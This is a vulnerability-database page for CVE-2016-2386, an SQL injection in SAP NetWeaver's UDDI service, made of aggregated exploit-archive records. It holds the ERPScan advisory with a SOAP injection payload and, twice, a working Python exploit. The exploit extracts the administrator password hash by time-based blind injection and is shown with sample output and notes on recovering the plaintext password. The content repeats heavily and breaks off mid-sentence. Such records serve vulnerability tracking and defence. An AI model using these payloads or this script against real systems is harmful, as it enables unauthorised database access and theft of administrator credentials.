ID CVE-2016-2386 Type cve Reporter cve@mitre.org Modified 2018-12-10T19:29:00
Description
SQL injection vulnerability in the UDDI server in SAP NetWeaver J2EE Engine 7.40 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka SAP Security Note 2101079.
{"exploitdb": [{"lastseen": "2016-05-19T21:35:56", "description": "SAP NetWeaver AS JAVA 7.1 - 7.5 - SQL Injection. CVE-2016-2386. Webapps exploit for xml platform", "published": "2016-05-19T00:00:00", "type": "exploitdb", "title": "SAP NetWeaver AS JAVA 7.1 - 7.5 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386"], "modified": "2016-05-19T00:00:00", "id": "EDB-ID:39840", "href": "https://www.exploit-db.com/exploits/39840/", "sourceData": "Application: SAP NetWeaver AS JAVA\r\nVersions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5\r\nVendor URL: http://SAP.com\r\nBugs: SQL injection\r\nSend: 04.12.2015\r\nReported: 04.12.2015\r\nVendor response: 05.12.2015\r\nDate of Public Advisory: 09.02.2016\r\nReference: SAP Security Note 2101079\r\nAuthor: Vahagn Vardanyan (ERPScan)\r\n\r\n\r\nDescription\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: SAP NetWeaver AS JAVA \u2013 SQL injection vulnerability\r\nAdvisory ID: [ERPSCAN-16-011]\r\nRisk: Critical\r\nAdvisory URL: https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/\r\nDate published: 09.02.2016\r\nVendors contacted: SAP\r\n\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\n\r\nImpact: Resource consumption\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE: 2016-2386\r\nCVSS Information\r\nCVSS Base Score v3: 9.1 / 10\r\nCVSS Base Vector:\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality High (H)\r\nI : Impact to Integrity High(H)\r\nA : Impact to Availability None (N)\r\n\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn SQL injection vulnerability means that a code comprises an SQL\r\nstatement that contains strings that can be altered by an attacker.\r\nThe manipulated SQL statement can be used to gain additional data from\r\nthe database or to modify the information.\r\n\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nSAP NetWeaver AS JAVA 7.1 - 7.5\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nTo correct this vulnerability, install SAP Security Note 2101079\r\n\r\n\r\n6. AUTHOR\r\n\r\nVahagn Vardanyan (ERPScan)\r\n\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nBy exploiting this vulnerability, an internal or external attacker can\r\nescalate their privileges. This access allows obtaining sensitive\r\ntechnical and business-related information stored in the vulnerable\r\nSAP system.\r\n\r\n\r\nPoC\r\n\r\nPOST /XXX/UDDISecurityImplBean HTTP/1.1\r\nContent-Type: text/xml\r\n\r\n<SOAP-ENV:Envelope\r\nxmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\nxmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n XXX\r\n\r\n<permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or\r\n'1'='1</permissionId>\r\n\r\nXXX\r\n\r\n</SOAP-ENV:Envelope>\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nSent: 04.12.2015\r\nReported: 04.12.2015\r\nVendor response: 05.12.2015\r\nDate of Public Advisory: 09.02.2016\r\n\r\n\r\n9. REFERENCES\r\n\r\nhttps://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\n\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\n\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\n\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\n\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\n\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\n\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\n\r\nERPScan is the most respected and credible Business Application\r\nSecurity provider. Founded in 2010, the company operates globally and\r\nenables large Oil and Gas, Financial and Retail organizations to\r\nsecure their mission-critical processes. Named as an \u2018Emerging Vendor\u2019\r\nin Security by CRN, listed among \u201cTOP 100 SAP Solution providers\u201d and\r\ndistinguished by 30+ other awards, ERPScan is the leading SAP SE\r\npartner in discovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to assist in improving the\r\nsecurity of their latest solutions.\r\n\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security, and provide solutions to evaluate and secure SAP\r\nand Oracle ERP systems and business-critical applications from both,\r\ncyber-attacks as well as internal fraud. Usually our clients are large\r\nenterprises, Fortune 2000 companies and managed service providers\r\nwhose requirements are to actively monitor and manage security of vast\r\nSAP landscapes on a global scale.\r\n\r\nWe \u2018follow the sun\u2019 and function in two hubs, located in the Palo Alto\r\nand Amsterdam to provide threat intelligence services, agile support\r\nand operate local offices and partner network spanning 20+ countries\r\naround the globe.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/39840/"}, {"lastseen": "2018-01-24T14:19:48", "description": "SAP NetWeaver J2EE Engine 7.40 - SQL Injection. CVE-2016-1910,CVE-2016-2386,CVE-2016-2388. Webapps exploit for Multiple platform", "published": "2018-01-10T00:00:00", "type": "exploitdb", "title": "SAP NetWeaver J2EE Engine 7.40 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386", "CVE-2016-2388", "CVE-2016-1910"], "modified": "2018-01-10T00:00:00", "id": "EDB-ID:43495", "href": "https://www.exploit-db.com/exploits/43495/", "sourceData": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\"\"\"\r\nAuthor: Vahagn Vardanyan https://twitter.com/vah_13\r\n\r\nBugs:\r\nCVE-2016-2386 SQL injection\r\nCVE-2016-2388 Information disclosure\r\nCVE-2016-1910 Crypto issue\r\n\r\n\r\n\r\nFollow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50\r\n \r\n POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1\r\n\tUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\n\tSOAPAction:\r\n\tContent-Type: text/xml;charset=UTF-8\r\n\tHost: nw74:50000\r\n\tContent-Length: 500\r\n\r\n\t<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:sec=\"http://sap.com/esi/uddi/ejb/security/\">\r\n\t <soapenv:Header/>\r\n\t <soapenv:Body>\r\n\t\t<sec:deletePermissionById>\r\n\t\t <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>\r\n\t\t</sec:deletePermissionById>\r\n\t </soapenv:Body>\r\n\t</soapenv:Envelope>\r\n \r\n\r\n\r\n\r\nIn SAP test server I have admin user who login is \"Administrator\" and so I used this payload\r\n\r\n %PRIVATE_DATASOURCE.un:Administrator%\r\n\r\nmost SAP's using j2ee_admin username for SAP administrator login\r\n\r\n %PRIVATE_DATASOURCE.un:j2ee_admin%\r\n\r\nYou can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure)\r\n\r\n\t1)\thttp:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#\r\n\t2)\thttp:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#\r\n\r\nInstead of J2EE_CONFIGENTRY table you can use this tables\r\n\r\n UME_STRINGS_PERM\r\n UME_STRINGS_ACTN\r\n BC_DDDBDP\r\n BC_COMPVERS\r\n TC_WDRR_MRO_LUT\r\n TC_WDRR_MRO_FILES\r\n T_CHUNK !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection\r\n T_DOMAIN\r\n T_SESSION\r\n UME_ACL_SUP_PERM\r\n UME_ACL_PERM\r\n UME_ACL_PERM_MEM\r\n\r\n\r\nAn example of a working exploit\r\n\r\n\tC:\\Python27\\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000\r\n\tstart to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit\r\n\tthis may take a few minutes\r\n\tFound {SHA-512, 10000, 24}M\r\n\tFound {SHA-512, 10000, 24}MT\r\n\tFound {SHA-512, 10000, 24}MTI\r\n\tFound {SHA-512, 10000, 24}MTIz\r\n\tFound {SHA-512, 10000, 24}MTIzU\r\n\tFound {SHA-512, 10000, 24}MTIzUV\r\n\tFound {SHA-512, 10000, 24}MTIzUVd\r\n\tFound {SHA-512, 10000, 24}MTIzUVdF\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFY\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYX\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXN\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk8\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88F\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6\r\n\tFound {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X\r\n\r\n\r\nAnd finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text\r\n\r\n\tbase64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasd\u00f3\u00c1q\u00b9\u0080\u00baX\r\n\r\n\"\"\"\r\nimport argparse\r\nimport requests\r\nimport string\r\n\r\n_magic = \"{SHA-512, 10000, 24}\"\r\n_wrong_magic = \"{SHA-511, 10000, 24}\"\r\n_xml = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" \" \\\r\n \"xmlns:sec=\\\"http://sap.com/esi/uddi/ejb/security/\\\">\\r\\n <soapenv:Header/>\\r\\n <soapenv:Body>\\r\\n \" \\\r\n \"<sec:deletePermissionById>\\r\\n <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, \" \\\r\n \"UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%{\" \\\r\n \"0}%') AND '1'='1</permissionId>\\r\\n </sec:deletePermissionById>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope> \"\r\nhost = \"\"\r\nport = 0\r\n_dictionary = string.digits + string.uppercase + string.lowercase\r\n\r\ndef _get_timeout(_data):\r\n return requests.post(\"http://{0}:{1}/UDDISecurityService/UDDISecurityImplBean\".format(host, port),\r\n headers={\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 \"\r\n \"Firefox/57.0\",\r\n \"SOAPAction\": \"\",\r\n \"Content-Type\": \"text/xml;charset=UTF-8\"\r\n },\r\n data=_xml.format(_data)).elapsed.total_seconds()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--host')\r\n parser.add_argument('--port')\r\n parser.add_argument('-v')\r\n\r\n args = parser.parse_args()\r\n args_dict = vars(args)\r\n\r\n host = args_dict['host']\r\n port = args_dict['port']\r\n\r\n print \"start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit \".format(host)\r\n _hash = _magic\r\n print \"this may take a few minutes\"\r\n for i in range(24): # you can change it if like to get full hash\r\n for _char in _dictionary:\r\n if not (args_dict['v'] is None):\r\n print \"checking {0}\".format(_hash + _char)\r\n if _get_timeout(_hash + _char) > 1.300: # timeout for local SAP server\r\n _hash += _char\r\n print \"Found \" + _hash\r\n break", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/43495/"}], "zdt": [{"lastseen": "2018-03-14T02:40:42", "description": "Exploit for java platform in category web applications", "edition": 2, "published": "2016-05-19T00:00:00", "type": "zdt", "title": "SAP NetWeaver AS JAVA 7.1 < 7.5 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386"], "modified": "2016-05-19T00:00:00", "id": "1337DAY-ID-25051", "href": "https://0day.today/exploit/description/25051", "sourceData": "Application: SAP NetWeaver AS JAVA\r\nVersions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5\r\nVendor URL: http://SAP.com\r\nBugs: SQL injection\r\nSend: 04.12.2015\r\nReported: 04.12.2015\r\nVendor response: 05.12.2015\r\nDate of Public Advisory: 09.02.2016\r\nReference: SAP Security Note 2101079\r\nAuthor: Vahagn Vardanyan (ERPScan)\r\n \r\n \r\nDescription\r\n \r\n1. ADVISORY INFORMATION\r\n \r\nTitle: SAP NetWeaver AS JAVA \u2013 SQL injection vulnerability\r\nAdvisory ID: [ERPSCAN-16-011]\r\nRisk: Critical\r\nAdvisory URL: https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/\r\nDate published: 09.02.2016\r\nVendors contacted: SAP\r\n \r\n \r\n2. VULNERABILITY INFORMATION\r\n \r\nClass: SQL injection\r\n \r\nImpact: Resource consumption\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE: 2016-2386\r\nCVSS Information\r\nCVSS Base Score v3: 9.1 / 10\r\nCVSS Base Vector:\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality High (H)\r\nI : Impact to Integrity High(H)\r\nA : Impact to Availability None (N)\r\n \r\n \r\n3. VULNERABILITY DESCRIPTION\r\n \r\nAn SQL injection vulnerability means that a code comprises an SQL\r\nstatement that contains strings that can be altered by an attacker.\r\nThe manipulated SQL statement can be used to gain additional data from\r\nthe database or to modify the information.\r\n \r\n \r\n4. VULNERABLE PACKAGES\r\n \r\nSAP NetWeaver AS JAVA 7.1 - 7.5\r\n \r\nOther versions are probably affected too, but they were not checked.\r\n \r\n \r\n5. SOLUTIONS AND WORKAROUNDS\r\n \r\nTo correct this vulnerability, install SAP Security Note 2101079\r\n \r\n \r\n6. AUTHOR\r\n \r\nVahagn Vardanyan (ERPScan)\r\n \r\n \r\n7. TECHNICAL DESCRIPTION\r\n \r\nBy exploiting this vulnerability, an internal or external attacker can\r\nescalate their privileges. This access allows obtaining sensitive\r\ntechnical and business-related information stored in the vulnerable\r\nSAP system.\r\n \r\n \r\nPoC\r\n \r\nPOST /XXX/UDDISecurityImplBean HTTP/1.1\r\nContent-Type: text/xml\r\n \r\n<SOAP-ENV:Envelope\r\nxmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\nxmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n XXX\r\n \r\n<permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or\r\n'1'='1</permissionId>\r\n \r\nXXX\r\n \r\n</SOAP-ENV:Envelope>\r\n \r\n \r\n8. REPORT TIMELINE\r\n \r\nSent: 04.12.2015\r\nReported: 04.12.2015\r\nVendor response: 05.12.2015\r\nDate of Public Advisory: 09.02.2016\r\n \r\n \r\n9. REFERENCES\r\n \r\nhttps://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/25051"}, {"lastseen": "2018-03-31T01:21:30", "description": "Exploit for multiple platform in category web applications", "edition": 1, "published": "2018-01-11T00:00:00", "type": "zdt", "title": "SAP NetWeaver J2EE Engine 7.40 - SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386", "CVE-2016-2388", "CVE-2016-1910"], "modified": "2018-01-11T00:00:00", "href": "https://0day.today/exploit/description/29436", "id": "1337DAY-ID-29436", "sourceData": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\"\"\"\r\nAuthor: Vahagn Vardanyan https://twitter.com/vah_13\r\n \r\nBugs:\r\nCVE-2016-2386 SQL injection\r\nCVE-2016-2388 Information disclosure\r\nCVE-2016-1910 Crypto issue\r\n \r\n \r\n \r\nFollow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50\r\n \r\n POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1\r\n User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\n SOAPAction:\r\n Content-Type: text/xml;charset=UTF-8\r\n Host: nw74:50000\r\n Content-Length: 500\r\n \r\n <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:sec=\"http://sap.com/esi/uddi/ejb/security/\">\r\n <soapenv:Header/>\r\n <soapenv:Body>\r\n <sec:deletePermissionById>\r\n <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>\r\n </sec:deletePermissionById>\r\n </soapenv:Body>\r\n </soapenv:Envelope>\r\n \r\n \r\n \r\n \r\nIn SAP test server I have admin user who login is \"Administrator\" and so I used this payload\r\n \r\n %PRIVATE_DATASOURCE.un:Administrator%\r\n \r\nmost SAP's using j2ee_admin username for SAP administrator login\r\n \r\n %PRIVATE_DATASOURCE.un:j2ee_admin%\r\n \r\nYou can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure)\r\n \r\n 1) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#\r\n 2) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#\r\n \r\nInstead of J2EE_CONFIGENTRY table you can use this tables\r\n \r\n UME_STRINGS_PERM\r\n UME_STRINGS_ACTN\r\n BC_DDDBDP\r\n BC_COMPVERS\r\n TC_WDRR_MRO_LUT\r\n TC_WDRR_MRO_FILES\r\n T_CHUNK !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection\r\n T_DOMAIN\r\n T_SESSION\r\n UME_ACL_SUP_PERM\r\n UME_ACL_PERM\r\n UME_ACL_PERM_MEM\r\n \r\n \r\nAn example of a working exploit\r\n \r\n C:\\Python27\\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000\r\n start to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit\r\n this may take a few minutes\r\n Found {SHA-512, 10000, 24}M\r\n Found {SHA-512, 10000, 24}MT\r\n Found {SHA-512, 10000, 24}MTI\r\n Found {SHA-512, 10000, 24}MTIz\r\n Found {SHA-512, 10000, 24}MTIzU\r\n Found {SHA-512, 10000, 24}MTIzUV\r\n Found {SHA-512, 10000, 24}MTIzUVd\r\n Found {SHA-512, 10000, 24}MTIzUVdF\r\n Found {SHA-512, 10000, 24}MTIzUVdFY\r\n Found {SHA-512, 10000, 24}MTIzUVdFYX\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXN\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk8\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88F\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6\r\n Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X\r\n \r\n \r\nAnd finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text\r\n \r\n base64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasd\u00f3\u00c1q\u00b9\u0080\u00baX\r\n \r\n\"\"\"\r\nimport argparse\r\nimport requests\r\nimport string\r\n \r\n_magic = \"{SHA-512, 10000, 24}\"\r\n_wrong_magic = \"{SHA-511, 10000, 24}\"\r\n_xml = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" \" \\\r\n \"xmlns:sec=\\\"http://sap.com/esi/uddi/ejb/security/\\\">\\r\\n <soapenv:Header/>\\r\\n <soapenv:Body>\\r\\n \" \\\r\n \"<sec:deletePermissionById>\\r\\n <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, \" \\\r\n \"UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%{\" \\\r\n \"0}%') AND '1'='1</permissionId>\\r\\n </sec:deletePermissionById>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope> \"\r\nhost = \"\"\r\nport = 0\r\n_dictionary = string.digits + string.uppercase + string.lowercase\r\n \r\ndef _get_timeout(_data):\r\n return requests.post(\"http://{0}:{1}/UDDISecurityService/UDDISecurityImplBean\".format(host, port),\r\n headers={\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 \"\r\n \"Firefox/57.0\",\r\n \"SOAPAction\": \"\",\r\n \"Content-Type\": \"text/xml;charset=UTF-8\"\r\n },\r\n data=_xml.format(_data)).elapsed.total_seconds()\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--host')\r\n parser.add_argument('--port')\r\n parser.add_argument('-v')\r\n \r\n args = parser.parse_args()\r\n args_dict = vars(args)\r\n \r\n host = args_dict['host']\r\n port = args_dict['port']\r\n \r\n print \"start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit \".format(host)\r\n _hash = _magic\r\n print \"this may take a few minutes\"\r\n for i in range(24): # you can change it if like to get full hash\r\n for _char in _dictionary:\r\n if not (args_dict['v'] is None):\r\n print \"checking {0}\".format(_hash + _char)\r\n if _get_timeout(_hash + _char) > 1.300: # timeout for local SAP server\r\n _hash += _char\r\n print \"Found \" + _hash\r\n break\n\n# 0day.today [2018-03-31] #", "sourceHref": "https://0day.today/exploit/29436", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:39", "description": "", "published": "2016-05-19T00:00:00", "type": "packetstorm", "title": "SAP NetWeaver AS JAVA 7.5 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2386"], "modified": "2016-05-19T00:00:00", "id": "PACKETSTORM:137129", "href": "https://packetstormsecurity.com/files/137129/SAP-NetWeaver-AS-JAVA-7.5-SQL-Injection.html", "sourceData": "`Application: SAP NetWeaver AS JAVA \n \nVersions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5 \n \nVendor URL: http://SAP.com \n \nBugs: SQL injection \n \nSend: 04.12.2015 \n \nReported: 04.12.2015 \n \nVendor response: 05.12.2015 \n \nDate of Public Advisory: 09.02.2016 \n \nReference: SAP Security Note 2101079 \n \nAuthor: Vahagn Vardanyan (ERPScan) \n \n \n \n \nDescription \n \n \n \n1. ADVISORY INFORMATION \n \nTitle: SAP NetWeaver AS JAVA \u2013 SQL injection vulnerability \n \nAdvisory ID: [ERPSCAN-16-011] \n \nRisk: Critical \n \nAdvisory URL: https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/ \n \nDate published: 09.02.2016 \n \nVendors contacted: SAP \n \n \n2. VULNERABILITY INFORMATION \n \nClass: SQL injection \n \nImpact: Resource consumption \n \nRemotely Exploitable: Yes \n \nLocally Exploitable: No \n \nCVE: 2016-2386 \n \nCVSS Information \n \nCVSS Base Score v3: 9.1 / 10 \n \nCVSS Base Vector: \n \nAV : Access Vector (Related exploit range) Network (N) \n \nAC : Access Complexity (Required attack complexity) Low (L) \n \nAu : Authentication (Level of authentication needed to exploit) None (N) \n \nC : Impact to Confidentiality High (H) \n \nI : Impact to Integrity High(H) \n \nA : Impact to Availability None (N) \n \n \n \n \n \n3. VULNERABILITY DESCRIPTION \n \nAn SQL injection vulnerability means that a code comprises an SQL \nstatement that contains strings that can be altered by an attacker. \nThe manipulated SQL statement can be used to gain additional data from \nthe database or to modify the information. \n \n \n \n \n4. VULNERABLE PACKAGES \n \nSAP NetWeaver AS JAVA 7.1 - 7.5 \n \nOther versions are probably affected too, but they were not checked. \n \n \n5. SOLUTIONS AND WORKAROUNDS \n \nTo correct this vulnerability, install SAP Security Note 2101079 \n \n \n \n6. AUTHOR \n \nVahagn Vardanyan (ERPScan) \n \n \n \n7. TECHNICAL DESCRIPTION \n \nBy exploiting this vulnerability, an internal or external attacker can \nescalate their privileges. This access allows obtaining sensitive \ntechnical and business-related information stored in the vulnerable \nSAP system. \n \n \nPoC \n \nPOST /XXX/UDDISecurityImplBean HTTP/1.1 \nContent-Type: text/xml \n \n<SOAP-ENV:Envelope \nxmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" \nxmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" \nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"> \nXXX \n \n<permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or \n'1'='1</permissionId> \n \nXXX \n \n</SOAP-ENV:Envelope> \n \n \n \n \n8. REPORT TIMELINE \n \nSent: 04.12.2015 \n \nReported: 04.12.2015 \n \nVendor response: 05.12.2015 \n \nDate of Public Advisory: 09.02.2016 \n \n \n \n9. REFERENCES \n \nhttps://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/ \n \n \n10. ABOUT ERPScan Research \n \nThe company\u2019s expertise is based on the research subdivision of \nERPScan, which is engaged in vulnerability research and analysis of \ncritical enterprise applications. It has achieved multiple \nacknowledgments from the largest software vendors like SAP, Oracle, \nMicrosoft, IBM, VMware, HP for discovering more than 400 \nvulnerabilities in their solutions (200 of them just in SAP!). \n \nERPScan researchers are proud to have exposed new types of \nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be \nnominated for the best server-side vulnerability at BlackHat 2013. \n \nERPScan experts have been invited to speak, present, and train at 60+ \nprime international security conferences in 25+ countries across the \ncontinents. These include BlackHat, RSA, HITB, and private SAP \ntrainings in several Fortune 2000 companies. \n \nERPScan researchers lead the project EAS-SEC, which is focused on \nenterprise application security research and awareness. They have \npublished 3 exhaustive annual award-winning surveys about SAP \nsecurity. \n \nERPScan experts have been interviewed by leading media resources and \nfeatured in specialized info-sec publications worldwide. These include \nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, \nHeise, and Chinabyte, to name a few. \n \nWe have highly qualified experts in staff with experience in many \ndifferent fields of security, from web applications and \nmobile/embedded to reverse engineering and ICS/SCADA systems, \naccumulating their experience to 